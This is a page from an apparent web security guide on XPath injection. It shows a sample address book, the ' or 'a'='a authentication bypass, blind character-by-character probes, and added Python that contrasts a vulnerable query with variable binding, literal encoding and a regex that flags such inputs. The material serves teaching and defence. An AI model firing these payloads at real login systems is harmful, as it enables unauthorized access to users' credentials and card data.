Web application security - the fast guide 1.1 | Page 127

Chapter 6 - Attack execution (2)
    <firstName>Chris</firstName>
    <surname>Dawes</surname>
    <password>secret</password>
    <email>cdawes@craftnet.de</email>
    <ccard>3981 2491 3242 3121</ccard>
  </address>
  <address>
    <firstName>James</firstName>
    <surname>Hunter</surname>
    <password>letmein</password>
    <email>james.hunter@pookmail.com</email>
    <ccard>8113 5320 8014 3313</ccard>
  </address>
</addressBook>
The following XPath query verifies the user-supplied credentials and retrieves the matching user's credit card number:
//address[surname/text()='Dawes' and password/text()='secret']/ccard/text()
Attack: Supplying the value ' or 'a'='a as the password makes the predicate true for every address node, so the query returns the credit card numbers of all users. If the structure of the document is not known, it is difficult to know exactly what to write; this problem is usually solved with what is called blind XPath injection.
' or substring(name(parent::*[position()=1]),2,1)='a
' or substring(name(parent::*[position()=1]),2,1)='b
' or substring(name(parent::*[position()=1]),2,1)='c
' or substring(name(parent::*[position()=1]),2,1)='d
etc.
Each probe in the previous listing tests a single character of a node name, so the listing as a whole can be used to extract node names one character at a time.
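The Python example below is added here and is not part of the book. It rebuilds the page's addressBook and credential query, shows why the string-built query is exposed to both the ' or 'a'='a bypass and the blind probes above, and contrasts it with two hardened forms (XPath variable binding and a safe string-literal encoder for engines without variables) plus a log-side heuristic that flags inputs shaped like the payloads on this page. It assumes lxml is installed; the function names and the detection pattern are my own choices, not the book's.

```python
"""Vulnerable vs. hardened XPath credential lookup (added example, not from the book)."""
import re
from lxml import etree

# Constructed sample document, same shape and sample data as the page's addressBook.
ADDRESS_BOOK = b"""<addressBook>
  <address>
    <firstName>Chris</firstName><surname>Dawes</surname>
    <password>secret</password><email>cdawes@craftnet.de</email>
    <ccard>3981 2491 3242 3121</ccard>
  </address>
  <address>
    <firstName>James</firstName><surname>Hunter</surname>
    <password>letmein</password><email>james.hunter@pookmail.com</email>
    <ccard>8113 5320 8014 3313</ccard>
  </address>
</addressBook>"""

ROOT = etree.fromstring(ADDRESS_BOOK)


def lookup_vulnerable(surname, password):
    """Builds the query by string concatenation, exactly as the page's query does.
    Untrusted input becomes part of the XPath expression itself, so a quote in the
    input changes the query's structure instead of being compared as data."""
    query = (f"//address[surname/text()='{surname}' and "
             f"password/text()='{password}']/ccard/text()")
    return [str(c) for c in ROOT.xpath(query)]


def lookup_parameterised(surname, password):
    """Binds the values as XPath variables ($s, $p). The expression is fixed at
    compile time; the input can only ever be a string operand of the comparison."""
    query = etree.XPath(
        "//address[surname/text()=$s and password/text()=$p]/ccard/text()")
    return [str(c) for c in query(ROOT, s=surname, p=password)]


def xpath_string_literal(value):
    """Encodes an arbitrary string as a safe XPath 1.0 string literal, for engines
    without variable binding. XPath 1.0 has no escape character, so a value holding
    both quote kinds is assembled with concat()."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"


def lookup_escaped(surname, password):
    """Same query as lookup_vulnerable, but every operand goes through the literal
    encoder, so the quote in a payload can never terminate the literal."""
    query = (f"//address[surname/text()={xpath_string_literal(surname)} and "
             f"password/text()={xpath_string_literal(password)}]/ccard/text()")
    return [str(c) for c in ROOT.xpath(query)]


# Heuristic for alerting on login inputs shaped like the page's payloads: a quote
# followed by or/and, or a call to an XPath function used in blind probing.
# Legitimate values can contain quotes (O'Brien), so use this for logging and
# rate-limiting decisions, not as the sole defence.
_SUSPICIOUS = re.compile(
    r"""['"]\s*(or|and)\b|\b(substring|name|string-length|count|position)\s*\(""",
    re.IGNORECASE)


def looks_like_xpath_injection(value):
    """Returns True when the input matches the injection heuristic above."""
    return bool(_SUSPICIOUS.search(value))


if __name__ == "__main__":
    payload = "' or 'a'='a"
    print("vulnerable, injected :", lookup_vulnerable("Dawes", payload))
    print("parameterised, injected:", lookup_parameterised("Dawes", payload))
    print("escaped, injected     :", lookup_escaped("Dawes", payload))
    print("flagged?              :", looks_like_xpath_injection(payload))
```

With the injected password the concatenated query returns both card numbers, while the variable-bound and literal-encoded queries return nothing, because the payload is compared as a plain string against each password element. The same holds for the blind substring probes: bound as data they can never reach the XPath evaluator as expressions, which is why variable binding (or, failing that, strict literal encoding plus an allow-list on the surname field) is the fix to prefer over filtering.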
6.12 LDAP injection